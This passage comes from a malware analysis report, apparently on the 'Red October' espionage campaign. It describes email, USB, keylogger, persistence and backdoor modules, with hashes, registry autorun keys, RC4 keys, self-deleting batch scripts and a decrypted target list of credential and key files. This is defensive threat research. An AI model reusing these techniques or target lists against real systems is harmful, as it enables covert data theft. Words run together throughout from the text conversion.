After the end of execution it deletes temporary files and self-removes with simple msc.bat file of the following contents:
chcp 1251:Repeatattrib -a -s -h -r "<module_filename>"del "<module_filename>"if exist "<module_filename>" goto Repeatdel "msc.bat"
Note, that current batch file sets current codepage to CP1251, which is used to display Cyrillic characters in console output.
4. Email groupMAPIClient moduleKnown variants:
MD5 Compilation date
09e75477e03a968eead17a28d8aef0ce 2012.10.26 07:02:24 (GMT)
10603f7ec89c3472b238e9342f5ba62b 2011.10.10 11:37:27 (GMT)
C196e32764dc698bb88714adfb874667 2012.05.04 11:31:35 (GMT)
0fe600e06a69ccebbb5baf6c9f5f51a6 2011.12.02 07:34:41 (GMT)
c3a50d78669cd58b2cd4e38e30c1e986 2011.11.11 07:13:55 (GMT)
298c4562c8463bed3039ff2d12669adc 2011.09.02 05:08:00 (GMT)
1f91b25d0893d4e1b0418ffeb21f1f03 2011.10.10 11:37:27 (GMT)
521b45d21b4b2fc48f7ab29ab222d6ee 2011.11.11 07:13:55 (GMT)
7883b174ce69ffed41d3aea54855ff97 2011.06.10 06:11:48 (GMT)
3975b42d9bb39741e988f78020edeb44 2011.11.11 07:13:55 (GMT)
SummaryThe file is a PE EXE file, compiled with Microsoft Visual Studio 2010. All the functionality is implemented in the WinMainfunction.
This module is used to steal email information of the current user by getting most valuable information about messages,starting from general fields (To/From/Date/Subj), copying full MIME headers and message body, and stealing attachments ifextension looks interesting (documents, archives, cryptokeys). The result is stored in a set of encrypted and compressedfiles, after that the application self-removes.
Main functionIt starts from creating a new encrypted log file in current directory of the executable, named “system32ocxms.dat”. The firstlog entries contain the following:
Program startedV: MSG_26.10.12 This probably indicate internal module name (MSG) and version (set after date of creation 26.10.12).Current application hasn't got an embedded config/script file in resource section, all parameters are hardcoded.
Next it fetches the current system general information and default application preferences from the registry, including thefollowing:
User nameComputer nameUser domain name (from %USERDOMAIN% and %USERDNSDOMAIN%)Default system HTTP protocol handler from HKCR\HTTP\shell\open\commandDefault system HTTPS protocol handler from HKCR\https\shell\open\commandDefault system application for html files from HKCR\htmlfile\shell\open\commandDefault system e-mail client from HKCR\mailto\shell\open\command
This information is added to the log file.
Next it checks if MS Outlook is installed, if it is actively running, whether it is system default e-mail client. This is appended tothe log either.
During next step, it creates a watchdog thread, which every checks foreground window every 10 milliseconds and in casecurrent foreground window belongs to current process it spawns self-removal batch-file (see description in section below)and terminates current process. This is done in case Microsoft Windows MAPI framework creates a popup message withsome connection error report, or asks the user to enter credentials from the mailbox. The developers obviously wanted toescape unnecessary attention and that is why they thought that it would be better to shutdown and self-remove the modulewithout collecting any information instead of getting caught by attracting attention.
After watchdog thread was created the module lists local user mail addresses by connecting to system MAPI. It gets UserEmail, Address Type and User Name. Next it iterates through existing MAPI storages for current user and dumps fullinformation about all messages to the main log file, including e-mail header values, such as
SubjectFromToDateAttachmentID
AttachmentNameAttachmentSize
The emails of attackers' interest with attachments are saved in a separate encrypted and Zlib-compressed storage file (newstorage file is created for each directory):
%CurrentDir%\sys_%HexNumber%\winocx_%IntegerCounter%_rdtp.tmp
The attachment storage file is limited to 60Mb, RC4 encryption key is
specialforoutlookattachments!
The filter for interesting emails is defined in a list of regular expressions (PCRE lib is used to process those):
.doc .xls .txt .vcf .p7m .mdb .msgz .dcx .egk .zm9 .docx .xlsx .eml .CCC .cif .fas .msg .kum .key .out .rtf .pdf .enc .TOK .wps
.sbox .lock .ass .cer .pem .odt .rar .html .xia .sec .cm5 .xps .pgp .wfh .cbu .ods .zip .htm .xis .dat .rhs .x05 .xiti .grp .sig .dot
.gpg mht .p7s .dth .max .y05 .egm .pot .ftil
Current module is also capable of dumping full contents of local system Address Book, however this functionality is currentlydisabled by the developer (probably because of some bugs in the code).
This module never communicates with the C&C server and works as a standalone tool. In the end of execution before exitingapplication it runs self-removal procedure as described below.
Self-removal procedureWhen the module needs to end the execution and self-remove, it creates a batch-file with pseudo-random name:%HOMEDRIVE%%HOMEPATH%\Local Settings\Temp\<HEXDIGITS(4-7 digits)>.bat.
If it couldn't create random name, the name will be set to "syspart.bat".
The file contains:
:Repeatdel /F /A "<CURRENT_MODULE_FILE_PATH>"if exist "<CURRENT_MODULE_FILE_PATH>" goto Repeatdel /F /A "<CURRENT_MODULE_FILE_PATH>"
POP3Client moduleKnown variants:
MD5 Compilation date (encrypted) Compilation date (payload)
224c382316be4be7e0009f08b84cd91e 2011.09.26 06:54:09 (GMT) 2011.05.25 11:49:19 (GMT)
100e53ee8fbeb4546b31eb7e0aad8752 2011.07.27 07:37:01 (GMT) 2011.05.25 11:49:19 (GMT)
SummaryThe file is a PE EXE file, compiled with Microsoft Visual Studio 2005.
This module is responsible for receiving and storing email messages on a local computer from a POP3 server specified in aconfiguration file. All the actions and important info are written to a log file.
Main functionCreates mutex "208D2C60-3AEA-1069-A2D7-08002B30309D"
Creates a directory and a log file in it: %ALLUSERSPROFILE%\Application Data\System\smrdprev.%d%d.tmp (%d values
correspond to time64() ^ 0x1F3E231 and GetTickCount()).
Installs in system AutoRun:
>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"LgfxTray"= PathToExe
Other Registry entries:
HKLM\SOFTWARE\Microsoft\ADOSoftware32HKCU\SOFTWARE\Microsoft\ADOSoftware32"ProductID" = SHA1(MAC, AdapterIP, VolumeSerialNumber, IE Product ID)
Always starts the log file from:
@LOG\CMAIL_LOCAL_v1_ %YEAR%%MONTH%%DAY%_%HOUR%%MIN%%SEC%.txt Software version: 0.8Current Directory: %s"--------PROGA START-------"
Opens mutex "huiofwhfiowjcpowjkcwcophwvurweionwopmcvopwkvpwjnhopv", if it exists, then module terminates.
Tries to open config file “jusched32s.dat” and read the contents. If the file doesn't exist, then terminates. Checks file MD5hash in file header (first 16 bytes), if it was changed after the last saved MD5 (in memory as a variable), then updates it andwrites the new hash to log file.
If calculated hash of the file buffer matched the header hash then module decrypts and parses config file and launchesPOP3 client thread, otherwise terminates.
Parameters in config file:
commonaccountconfig_idemail_hash_pathstorage_pathstorage_sizeload_periodtime_deltasize_minsize_maxstorage_hash_sizeuninstallloginpasswordpop3serverimapserveruseemail
If "unistall" parameter is set in config file, then module deletes AutoRun keys in registry, config file jusched32s.dat andterminates.
POP3 client thread
By default all connections are not encrypted with SSL. There is a variable which for some reason is not initialized, that isused to control the network communication, i.e. to use SSL encryption or not.
Establishes a connection based on ‘pop3server’ (or ‘imapserver’), ‘login’ and ‘password’ parameter values in config file.
After receiving the number of emails as a response on STAT command starts processing emails in cycle.
Forms an MD5 hash from a string in format “%s%s%s” with 'login' parameter, 'pop3server' parameter and the value thatdepends on current processed email number and UIDL response.
Seeks in directory specified in 'email_hash_path' for *mso.dat files, reads their contents and compares the hashes stored inthem with calculated hash.
If calculated hash is found in the contents, then the module doesn’t process the current email, otherwise gets email messagesize from a POP3 server with a LIST command.
Creates File %email_hash_path%\%s%.mso.dat (%s - CRC32(GetUserName)) and appends counted hash to it. If the newFile Size is bigger than 'storage_hash_size' than rewrites the file with the latest data so it's size doesn’t exceed'storage_hash_size'.
If email size is in the range 'size_min'-'size_max' then the module retrieves email headers and email message body,otherwise stops email processing. Then the module parses the response, retrieves the date of email, counts days elapsedand compares it to 'time_delta'. If it's bigger than 'time_delta' then breaks the email processing cycle.
Creates file: %storage_path%\bcmntc.%d.tmp (%d - time64 ^ 0x1F3E231.tmp) with decrypted contents including emailheader: @CMAIL_LOCAL\%s_%04u%02u%02u_%02u%02u%02u\%d.eml ('email' field, Date, Email number) and emailcontents itself. Some buffers are compressed with zlib.
All the collected data is stored locally and isn’t uploaded to any C&C by this module.
5. USB Drive groupUSBContainer moduleKnown files
MD5 Compilation date (encrypted)
b9568a91d6f6b0904de8b2e9d9a2d32c 2010.06.01 11:24:07 (GMT)
f0eaec0b25afc24a416810fe46242590 2010.06.01 11:24:07 (GMT)
865ba7958efe7e54501dcf2c19dcd99e 2010.06.01 11:24:07 (GMT)
SummaryThis is a standalone EXE application module which is used to drop and run USBStealer module (IGFXTRAYMS.exe) alongwith its configuration file (imapisync32.dat)
Those two files are zlib compressed and stored in the overlay of the dropper.
Main functionUpon execution, the dropper reads its overlay and decompresses it in memory.
The configuration file "imapisync32.dat" is dropped first followed by the opening of a system event named“ScxinWordSid_0129211FA". This event is created by the USBStealer module.
Afterwards, it will try to delete the "IGFXTRAYMS.EXE" file without checking if it exists or not.
The USBStealer module is then dropped using the following file name: "IGFXTRAYMS.EXE" and executed. Both files aredropped in the same directory of the dropper.
Finally, the following will be executed 3 times before exiting:
C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\%PATH_TO_DROPPER.EXE% >> NUL
This module doesn’t create any execution log files, nor does it connect to the C&C servers.
USBRestoreKnown files
MD5 Compilation date (encrypted)
9572cc04fd442027cfd61178bdf73c0c 2011.07.15 12:30:29 (GMT)
feba0bbead1a810c223cf8252b529d65 2011.06.02 12:30:50 (GMT)
4aabfd510ef66e066946087617638090 2011.06.02 12:30:50 (GMT)
1d124d06666cfa6b33768f1147208b9c 2011.07.15 12:30:29 (GMT)
260ad160972ca6bc071b7cb518a9b5fa 2011.06.02 12:30:50 (GMT)
ab72d7ed99c3c18f2582b6e9cd5ec875 2011.06.02 12:30:50 (GMT)
ef6751567cbf7c92cd3880fc7aa425c9 2011.07.15 12:30:29 (GMT)
56c06123e34dcc8a8e464da9acd852bb 2011.05.23 11:33:26 (GMT)
a6d549d7c90c412a20fc9e7abc829eb5 2011.07.15 12:30:29 (GMT)
be6f3c214d2a579728fc3537c6454f8c 2011.07.15 12:30:29 (GMT)
0883d6533aa4fb0e40a6e48a66ea84d4 2011.05.23 11:33:26 (GMT)
c3e70e9b50cd3f6cfcd0ac75a60b3464 2011.06.02 12:30:50 (GMT)
75b824c5a6a9b950ccbdaee577fe964b 2011.07.29 10:59:44 (GMT)
9bb26fb5179db8515cdc81cb9f40387d 2011.07.29 10:59:44 (GMT)
d9851c67bfeec5cc37db99be07061857 2011.06.02 12:30:50 (GMT)
07999110cab8c6558be11684d2c02793 2011.07.15 12:30:29 (GMT)
9d5bb8f9441d31148bf4f190e27764cc 2011.06.02 12:30:50 (GMT)
ecd7bec9522e64df7b179b512e71c154 2011.06.02 12:30:50 (GMT)
5e215b9272e4a0ff0d9725ac94bd1541 2011.06.02 12:30:50 (GMT)
9a9dbd2a398fda91167169b0866047d1 2011.07.15 12:30:29 (GMT)
4355f29680630980cf732e46306a39ce 2011.07.15 12:30:29 (GMT)
d4d959bffa33b0e3076421a02e69f13b 2011.07.15 12:30:29 (GMT)
f2bb34acdebcbbd335e6cc2816a0c5f0 2011.06.02 12:30:50 (GMT)
ca25ca44ef0106c4080415f1c2090400 2011.07.15 12:30:29 (GMT)
83ee5deb488d58d924134781e76c416c 2011.06.02 12:30:50 (GMT)
9aa8f3ed12ef1003d24c771af69879f8 2011.07.15 12:30:29 (GMT)
19cc111e41d804f20e5f65c6d0a48953 2011.07.15 12:30:29 (GMT)
acfc7040304b19422ba0a1278b4d9c48 2011.05.23 11:33:26 (GMT)
a515279eee527f7d20f82ef673308151 2011.06.02 12:30:50 (GMT)
SummaryThis module is a standalone Windows executable which is automatically started on system boot and runs secretly in thebackground. It expects removable media arrival and recovers deleted files of attackers' interest from it. This lets the attackercopy deleted docs as well as ZIP and RAR archives from attached removable media.
InitializationUpon start the module creates a general purpose log file in %TMP%\smrdprev.<DWORD1><DWORD2>.tmp, where DWORDis a current time value xored with 0x1F3E231, DWORD2 is value of GetTickCount() API call.
So, basically log file path is %TMP%\smrdprev.<RANDOM_HEX_NUMBER>.tmp. Same xor value is used among all variantswe have seen (20+ files).
General log starts with internal module name which is essentially "USB_RESTOREv1". It also logs software version which is"0.5" for current module. Other modules had different hardcoded versions. The variants we have seen had 0.3, 0.5 and 0.6.However, there are few files which didn't have any indication of internal module version and are probably the earliestversions. The log file also includes detailed information about the system it was launched on. Example of system info:
TIME: "2012-11-12 18:07:26 514"ADMIN: "1"UserName: "user"ComputerName: "WIN_XP_105"TimeZone: "Russian Standard Time"LOCALE: "Russian_Russia.1251"OEMCP: "866"ACP: "1251"OwnFile: "C:\wusb.exe"
The module changes registry to run automatically during system start:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon32rt = <path to current executable>
If it didn't succeed with HKLM (HKLM) it will try to set similar value in HKCU (HKCU).
Next step, it checks if current user has local administrator rights and logs this as well ("----ADMIN MODE----" or "----USERMODE----").
One more string is added to the log which indicates end of initialization stage and start of main functionality: "WUSB: begin".This is probably a reference to another module internal name: "WUSB".
Main ProcedureIt creates an invisible window named "sbw" (Unicode) with window class "Win32UserHost". The module callsRegisterDeviceNotification() API to receive systen notifications from particular device GUIDs:
F18A0E88-C30C-11D0-881500A0C906BED8 (GUID_DEVINTERFACE_USB_HUB)A5DCBF10-6530-11D2-901F00C04FB951ED (GUID_DEVINTERFACE_USB_DEVICE)
So far, the module waits for notifications from USB hubs or USB devices attached to the local system. According to thenotification handler code, the module is only interested in new attached volumes except those which were mapped to letterA: (reserved for Floppy drives). Once the new volume appears in the system the module starts a separate thread to processthis event. Device is never processed twice until it is plugged in again, the module stores currently mounted devices andhandles device removal events properly.
When new USB drive is attached, the module obtains USB device software and vendor ID, drive character, volume name,filesystem type, volume serial number, number of free and used bytes. Then it reads the filesystem using direct disk accessand own parser of FAT-based filesystems. It is unable to read other filesystems including NTFS.
Own filesystem parser code allows to avoid using system API to access files, and thus bypass various IDS/IPS software andat the same time look into slack space of the disk. This lets the attackers reveal already deleted files on removable drives.The module creates additional debug log which traces execution events and records all problems that have occured. Thefilesystem parser log files are located in %TMP%\hsperfdata32sys\bcmntc_rt_*
The parser log includes all discovered filenames, including deleted files. The same module is capable of recovering deletedfiles. It can recognize file types and recover original files depending on format. It is designed to recognize the following fileheaders: DOCX, XLSX, DOC, XLS, RAR, ZIP. Recovered files are saved in %TMP%\hdbrt32sys\ms32jxtr.dat.
All files created by the module, including logs are stored in custom binary format, which may use Zlib compression, andcustom encryption.
This module doesn’t communicate with any C&c server, all files are stored locally.
USBStealer moduleKnown files
MD5 Compilation date (encrypted)
51d5f5a5c7de6a175e269236c2c574b0 2010.10.14 07:07:58 (GMT)
bbe23b8baec0afbd54154820f4a9d7ea 2010.10.14 07:07:58 (GMT)
6abd3d906ebd0e6bf4fb8d00273fdc66 2010.10.14 07:07:58 (GMT)
b9114882ed3a184f8a58284f3fe57cb0 2011.03.02 09:54:14 (GMT)
657f0f4f6183cd2e87fdfd8a88f927c9 2010.10.14 07:07:58 (GMT)
900ab792a9dc9ae35c821cce98164d81 2010.10.14 07:07:58 (GMT)
18bd71030b18f3bc93d08b650ae0d43d 2011.03.02 09:54:14 (GMT)
187adc0380142c61224c53eac9a70955 2011.03.02 09:54:14 (GMT)
78f2c84fefe80bc84361c40d2bbd0501 2010.10.14 07:07:58 (GMT)
b2c60688dc2de4dd4de1f393ae59e317 2010.10.14 07:07:58 (GMT)
3b4125c8dc55ae54fa244a8fdcea8bc9 2011.03.02 09:54:14 (GMT)
760333093fbcc38f6b8d7e1667d192b8 2010.10.14 07:07:58 (GMT)
ffd4096c5d2a2a4801ac6e8ab250a0d0 2011.03.02 09:54:14 (GMT)
92b6b580f1d2e5409a6feb5c8883de2b 2011.03.02 09:54:14 (GMT)
daf244aacbac081693b914a4a1486fa5 2010.10.14 07:07:58 (GMT)
2b08ae138fd27ba62b7ea1e35d38b56f 2010.10.14 07:07:58 (GMT)
48c4e2386cbae6a71b4eccab21ead6e5 2011.03.02 09:54:14 (GMT)
a39636c2fb253ae9ff7b7c0294abf8ac 2011.03.02 09:54:14 (GMT)
f27870dd7bfa952636850a76205f4ba3 2010.10.14 07:07:58 (GMT)
c64343fad7c1f98a8342bd29829fcdf1 2010.06.01 12:13:42 (GMT)
58fbcf7d9146eba51c22e91bdf7128d0 2010.10.14 07:07:58 (GMT)
5c563e849ec86a542daf492b31dde2bb 2010.10.14 07:07:58 (GMT)
4c205fc9c7dbd95316f9ed5aafa34712 2010.10.14 07:07:58 (GMT)
b0e2f3c972477e750d5adbed3650ae81 2010.10.14 07:07:58 (GMT)
SummaryThis is a standalone EXE application module which is used to automatically track and steal interesting files on removabledisks attached to infected system. It starts automatically on system boot. Criterias for files are defined in external encryptedbinary config file which must be deployed during setup. It creates own database of known files' hashes and registers alistener for filesystem changes to do that efficiently.
InitializationAt the start it creates system mutex named 'Win32Wbem32Prefetch', a system event named "ScxinWordSid_0129211FA"(used to signal end of execution) and a log file at %TMP%\imapispool.<HEXNUMBER1>.0x<HEXNUMBER2>.ids.
It collects basic system information such as current computer name, current username, and path to original executablemodule where it started from.
This information is put in the log file in the first place along with current date and time. Every time module adds anything tothe log file, it checks if the log file exceeds 15MB size. If that's true it deletes current log file and opens a new one using thesame path.
It changes registry settings to start automatically on system boot. The changes are made toHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winns32comp value.
Main ProcedureIt creates an invisible window named "sbw" with window class "Win32UserHost". This window receives notifications fromspecific device types. The module calls RegisterDeviceNotification() API to listen for notification from the system on particulardevice GUIDs:
F18A0E88-C30C-11D0-881500A0C906BED8 (GUID_DEVINTERFACE_USB_HUB)A5DCBF10-6530-11D2-901F00C04FB951ED (GUID_DEVINTERFACE_USB_DEVICE)
At the same time it create configs monitoring thread which reacts on file changes and reloads new values. The config filesare stored in the same directory where current executable module is and named "imapisync32.dat", "wmilibrt.dat".imapisync32.dat is encrypted using some custom algorithm, and has information about file targets to track and copy if found.There are common criterias of file size, file age, etc. The module utilizes PCRE (Perl Compatible Regular Expressions)library to effectively apply regular expression white and blacklists against filenames. The criterias are splitted into groups andparameters are names with specific prefix of the group (a, d, s, sd, fa). If group is ended with “a”, that is used as a whitelist,filenames that match against such regexps are to be stolen. Groups ending with “d” represent blacklist, files will be ignored.Below is full decrypted config (imapisync32.dat) with our comments after "#" character:
magic=/lddata/ # magic string identifying config file start_st_size=/300000000/ # max size of the storage (300MB)_id=/00020/ # internal storage id_fdeltatime= /2592000/ # files must be not older than 2592000 seconds or 30 days_max_size=/20000000/ # maximum size of a single file must be not larger than 20MB_min_size=/1/ # files must not be smaller than 1 bytea=/\.txt$/ a=/\.csv$/ # Comma-Separated Values, tabular data filea=/\.eml$/ # exported e-mail filea=/\.doc$/a=/\.vsd$/ # MS Visio document filea=/\.sxw$/ # StarOffice/OpenOffice document file
a=/\.odt$/ # OpenOffice document filea=/\.docx$/a=/\.rtf$/a=/\.pdf$/a=/\.mdb$/ # MS Access database filea=/\.doc\./ # *.doc.* files, could be for an archive of MS Word document filea=/\.odt\./ # *.odt.* files, could be for an archive of OpenOffice document filea=/\.docx\./ # etca=/\.rtf\./a=/\.pdf\./a=/\.xls\./a=/\.wab$/ # Windows Address Book file (used in Outlook Express)a=/accounts\.ini/ # could be Opera browser accounts and settings filea=/account\.cfn/ # TheBat! e-mail client accounts and settings filea=/signons\.txt/ # saved user names and passwords in Thunderbird, Sunbird, and earlier versions of Firefoxa=/ScribeOptions\.xml/ # probably settings of Scribe crossplatform e-mail clienta=/wand\.dat/ # Opera browser password manager databasea=/bpftp\.dat/ # BulletProof FTP client password databasea=/sm\.dat/ # CuteFTP password databasea=/smdata\.dat/ # CuteFTP password databasea=/FileZilla\.xml/ # FileZilla FTP client password and settings databasea=/ftplist\.txt/ # TotalCommander ftp upload file list (may contain credential information)a=/addrbk\.dat/ # TurboFTP password and settings filea=/wcx_ftp\.ini/ # Total Commander cached FTP credentials databasea=/ws_ftp\.ini/ # WS_FTP client password and settings filea=/andrq\.ini/ # &RQ ICQ client password and settings filea=/account\.xml/ # Very generic name, used in various softwarea=/odigo\.com\.odu/ # Odigo instant messenger settings filea=/TheBee\.ini/ # Some "The Bee" software ini file, unclear which software it is
# The following subgroup defines useless files that will not be taken.
d=/\\~wordspool.*\.tmp\.doc$/ d=/\\~wordspool.*\.srt\.doc$/ d=/\\~wordspool.*\.rtc\.doc$/
_s_fctime= /1990-01-01 01:02:03/ # files of group "s" after 1990-01-01 are interesting_s_max_size=/20000000/ # max size for group "s" is 20MB as well_s_min_size=/1/ # min size is 1 byte
# Some patterns of filenames below seem to be related to some other malware seen on usb drives. It may contain stolencredentials, so they copy it as well.
sa=/.*mssysmgr\.ocx/ sa=/.*\.cab\.bak/sa=/.*list\.tlb/sa=/.*drive\.tlb/sa=/.+\\\$lddata\$\\.+/sa=/.+\\NT.Config\\.+/sa=/.*\\ldupver\.txt/sa=/\w:\\[\d\w]+\.dll/sa=/\w:\\[\d\w]+\.exe/sa=/.*autorun\.inf/
sa=/.*thumb\.dd/sa=/.*thumb\.db/sa=/.*msnmsngr\.exe/sa=/.*svchost\.exe/sa=/.*EXPLORER\.EXE/sa=/.+\.iau/sa=/.+\.rst/sa=/\.xps/ # This is a subgroup of various files with secrets, such as digital certificates, configs and password databasessa=/\.cif$/sa=/\.key$/sa=/\.crt$/sa=/\.cer$/sa=/\.hse$/sa=/\.pgp$/sa=/\.gpg$/sa=/\.conf$/sa=/passw/sa=/secret/sa=/crypt/sa=/krypt/sa=/cypher/sa=/cipher/sa=/\.ovpn$/sa=/\.xia$/sa=/\.xiu$/sa=/\.xis$/ sa=/\.xio$/sa=/\.xig$/sa=/pubring.*/ sa=/secring.*/sa=/\.acidcsa$/sa=/\.acidsca$/sa=/\.aciddsk$/sa=/\.acidpvr$/sa=/\.acidppr$/sa=/\.acidssa$/sa=/\\ACIDInstallv.*\.exe$/sa=/\\ACIDdirInstallv.*\.exe$/ sa=/\\Acid Technologies\\/ # Probably this and above refers to Acid Cryptofiler military gradeencryption softwaresa=/.*cisco.*\.txt$/sa=/.*cisco.*\.cfg$/_f_fctime= /1999-02-03 02:03:07/_f_max_size=/10000000/_f_min_size=/1/fa=/~WRD32cache.*\.doc$/fa=/glxcrt.*\.dat/fa=/bcmntc.*\.tmp/fa=/smrdprev.*\.tmp/ a=/\.ttr$/ # maybe TTR Backup software?a=/\.tbe$/ # uncleara=/\.tte$/ # unclear a=/\._ok$/ # unclear
a=/\.ki$/ # uncleara=/\.txt$/a=/\.tvt$/a=/\.txr$/ # CorelDraw file?a=/\.tvr$/a=/\.tbr$/a=/\.kin$/
Config file may change during module work and there is a special thread that monitors config file changes and loads newconfiguration when it is changed.
The module lists all available attached removable drives, iterates through all of them except A: and B: (reserved for floppydisks). It collects full file paths and file meta-information, compresses, encrypts and stores this in%TMP%\mrtdsync\win64esrt_* database. Additionally, files from the list of interest are copied to win64berts* files, which alsohave full information and body of the file. It is encrypted and compressed twice.
There is a separate thread to monitor filesystem changes and every time new file/directory is created or changed on themonitored drives updated information goes to %TMP%\mrtdsync\win64esrt_* in separately spawned thread, additionally allchanged or created files are copied to a new win64berts* file.
This module works offline and doesn't communicate with any other host on the network.
6. Keyboard groupKeylogger moduleKnown variants:
MD5 Compilation date (encrypted) Compilation date (payload)
33bda0e77b840809e66e12d020e054c5 2011.04.14 12:00:26 (GMT) 2010.10.05 10:53:49 (GMT)
3cb7318ed40239f7219d86343a17b54b 2011.05.10 07:45:02 (GMT) 2010.10.05 10:53:49 (GMT)
dfcce19f2852db652071088bf9461b4a 2011.05.10 07:44:55 (GMT) 2010.10.05 10:53:49 (GMT)
6079a0746e76c1090dc110e08de645e2 2011.05.20 11:00:18 (GMT) 2010.10.05 10:53:49 (GMT)
57897c997c699135b9460c0be7a4b27e 2011.10.10 07:59:41 (GMT) 2010.10.05 10:53:49 (GMT)
ecc7a5ef3f5e92f0c7da0bef8d392b5f 2011.05.12 10:47:39 (GMT) 2010.10.05 10:53:49 (GMT)
The file is a PE EXE file, compiled with Microsoft Visual Studio 2005. Its main purpose is to log keystrokes, copy input textsand make screenshots.
Main functionOpens and Creates Event WIN_%08X%08X%08X%08X%08X (SHA1(first 512 bytes of self file)), if exists, terminates. Sets inAutoRun, using the following registry keys:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run“Mspmr32” = %Path to the module%
Deletes file “Keylogger.log” (this filename is not used anywhere else). Registers a window class with RegisterClassEx APIusing ClassName “svchost.exe”, assigns a window procedure that implements main module functionality. Creates windowwith CreatWindowEx API using ClassName “svchost.exe”, window name “svchost” and associates it with a registered class.
Registers a device with RegisterRawInputDevices API and associates it with created window with a flag RIDEV_INPUTSINK
which enables the caller to receive the input even when the caller is not in the foreground.
Window procedureAll the logging actions are implemented basing on receiving WM_INPUT window message, if raw input for GetRawInputDataAPI comes from keyboard and GetRawInputData received WM_KEYDOWN message.
Collected informationIt collects some general information about current user and opened windows/processes:
Foreground window text or WT_UNKNOWNModule FileName or MN_UNKNOWNForeground window class nameUserName
It is capable of making full desktop screenshots, copying clipboard data of password input fields (to check a windowEM_GETPASSWORDCHAR is sent to the window).
If “Shift+Insert”, “Ctrl+C”, “”Ctrl+V”,”Ctrl+X”, “Ctrl+Insert” is pressed then it copies clipboard data.
Creates File %TMP%\SSDPserv32\ssdtrbs%08x%.sys.%d% (%08x – Random Hex value, %d – time64()). All the collectedinformation is compressed with Zlib and RC4 encrypted with the key “qefwljkfnw3l;fjwe;fklwejfw;eflkwe;flwe”and written to thisfile.
file:///F|/RedOctober - KasperskyLab/“Red October”. Detailed Malware Description 4. Second Stage of Attack - Securelist.html[15.03.2013 22:08:27]
“Red October”. Detailed Malware Description 4. SecondStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792273/Red_October_Detailed_Malware_Description_4_Second_Stage_of_Attack
“Red October”. Detailed Malware Description 4. Second Stage of AttackFirst stage of attack
1. Exploits2. Dropper3. Loader Module4. Main component
Second stage of attack1. Modules, general overview2. Recon group3. Password group4. Email group5. USB drive group6. Keyboard group7. Persistence group8. Spreading group9. Mobile group
10. Exfiltration group
7. Persistence groupScheduler moduleKnown locations: %APPDATA%\Microsoft\RtkN32Gdi.exe
The module is created and executed (for the first time) by the module "fileputexec".
Known variants:
MD5 Compilation date (encrypted) Compilation date (payload)
43C0BA45BE45CA20ED014A8298104716 2012.10.24 13:12:43 (GMT) 2012.10.11 07:19:12 (GMT),
SummaryThe file is a PE EXE file, compiled with Microsoft Visual Studio 2010.
Creates encrypted log files: "%TMP%\smrdprev\smrdprev_%p_%p.tmp", where "%p" parameters are formatted from thereturn values of subsequent GetTickCount API calls.
Creates event: "Global\wsheledstpknt"
Creates mutex: "NtWinWMIctlshed"
When started, the module initializes its log object with a new filename. Then, it creates one of the following registry values toensure its automatic start:
Evernote Export
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\servise=%path to the module's executable file%
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load=%path to the module's executable file%
Then, the module enters an infinite loop where it executes its main function with 300 second delay between iterations.
Main functionThe module traverses the directories from a hardcoded list, looking for files with names matching regular expressions".*\..*\.bak" and ".*\..*\.trh". The list of directories:
%ProgramFiles%\Microsoft Common\%ProgramFiles%\Common Files\%SystemDrive%\Documents and Settings\LocalService\Application Data\Microsoft\%SystemDrive%\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\%ALLUSERSPROFILE%\%ALLUSERSPROFILE%\Application Data\%ALLUSERSPROFILE%\Application Data\Microsoft\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\%ALLUSERSPROFILE%\Application Data\Microsoft\Windows\%windir%\Installer\%windir%\Help\Tours\mmTour\%windir%\Help\Tours\htmTour\%windir%\Help\Tours\WindowsMediaPlayer\%windir%\IME\%windir%\MsApps\%windir%\MsApps\MsInfo\%windir%\inf\%HOMEPATH%\Local Settings\%APPDATA%\%APPDATA%\Microsoft\Office\%APPDATA%\Microsoft\Office\Data\%APPDATA%\Microsoft\Windows\%windir%\Temp\%TMP%\%module's installation directory%
Any found file with the extension ".trh" is deleted.
Files with the extension ".bak" are treated differently. They are decrypted using a custom AMPRNG algorithm with ahardcoded key, then decompressed using LZMA. If the file was decompressed without errors, it is expected to start with aheader that describes an internal task.
Each task has a name and a "type" field. Depending on that field, the module treats the contents of the decrypted filedifferently:
Tasktype Task action
1 The task is a PE EXE file. It is written to a temporary file '%TMP%\%number%.exe' and executed with CreateProcess API.The file is removed when the process terminates.
3 The task is a PE DLL file. It is loaded in memory with a custom PE loader. Then, its export named 'START' is called.
The task is a new version of the 'scheduler' module. The original module is moved to a file with extension '.trh' and
4 deleted, the task's contents are written instead.
Known variants of the ".bak" task files were created by the "fileputexec" module. They all contained a task named "fileinfo".
DocBackdoor (Acrobat Reader and Microsoft Office plugin) moduleKnown file locations: add-on directories of Acrobat Reader or Microsoft Office, depends on installation settings.
Known variants:
MD5 Compilation date (payload)
1294af519b9e6a521294607c8c1b3d27 2012.05.14 08:49:35 (GMT)
SummaryThe file is a PE DLL file with 1 exported function, compiled with Microsoft Visual Studio 2010. The malware contains auniversal plugin for Acrobat Reader and Microsoft Office application. The plugin does not depend on the application so itcould have been used with other applications, too.
Export(s): winampGetGeneralPurposePlugin
All the functionality is implemented in the DllMain function.
DllMain functionWhen loaded, the module starts a new thread and returns. In the new thread, the module executes its main function in aninfinite loop, with 1 second delay.
Main functionThe module iterates through file handle values from 0 to 65534 with step 4, and tries to get file size for every handle. If call toGetFileSize succeeds, the module assumes that it found a valid file handle, and proceeds with this file. The file handle maybelong to any file that is currently open by the application, including any open documents (i.e. PDF, DOC, XLS, PPT files).
The module retrieves the name of the file, reads the whole file into memory and checks its last DWORD. If the value is notequal to the magic number 0x29A (666 decimal), it skips this file. If the DWORD matches the magic value, it reads morevalues from the end of file.
Offset from the end of file Type Description
-4 DWORD Magic number 0x29A
-5 BYTE Operation mode byte
-9 DWORD Payload length
-9 - Payload length BYTE*payload length Encrypted payload
